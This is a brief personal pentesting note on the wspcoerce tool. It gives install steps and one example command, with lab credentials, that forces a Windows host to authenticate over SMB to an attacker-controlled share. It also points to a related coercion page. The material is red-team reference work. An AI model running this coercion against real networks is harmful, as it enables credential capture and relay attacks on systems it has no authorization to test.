# wspcoerce

## Install/run
```
git clone https://github.com/RedTeamPentesting/wspcoerce.git  
cd wspcoerce
pipx install .
wspcoerce 'lab.redteam/rtpttest:test1234!@192.0.2.115' "file:////attacksystem/share"
```
I believe this only coerces an SMB connection.  More info [here](https://blog.redteam-pentesting.de/2025/windows-coercion/).

## Note to self
Every single time I try to remember how to enable WebClient service on Windows 11 boxes, I come to this page.  But this is NOT the coercer you're looking for!  You want to look at [rpc2efs](/pentesting/internal/rpc2efs).
